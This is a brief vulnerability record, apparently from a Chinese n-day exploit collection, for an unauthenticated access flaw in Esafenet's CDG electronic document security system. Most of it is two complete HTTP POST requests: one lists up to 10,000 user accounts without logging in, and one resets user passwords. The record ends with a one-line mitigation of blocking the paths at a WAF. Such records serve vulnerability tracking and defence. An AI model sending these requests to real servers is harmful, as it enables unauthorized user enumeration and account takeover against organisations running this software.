vendor = "亿赛通"
name = "亿赛通新一代电子文档安全管理系统身份绕过漏洞"
type = "未授权访问"
version = "未知"
path = "/CDGServer3/openapi/getAllUsers /CDGServer3/rpc/userManage/userPwdReset.js"
detail = "POST /CDGServer3/openapi/getAllUsers HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 27 pageSize=10000&pageNumber=1 POST /CDGServer3/rpc/userManage/userPwdReset.js HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 12 userIds=test"
fix = "WAF封禁路路径，等待发布补丁"
date = "0813"
label = "nday"
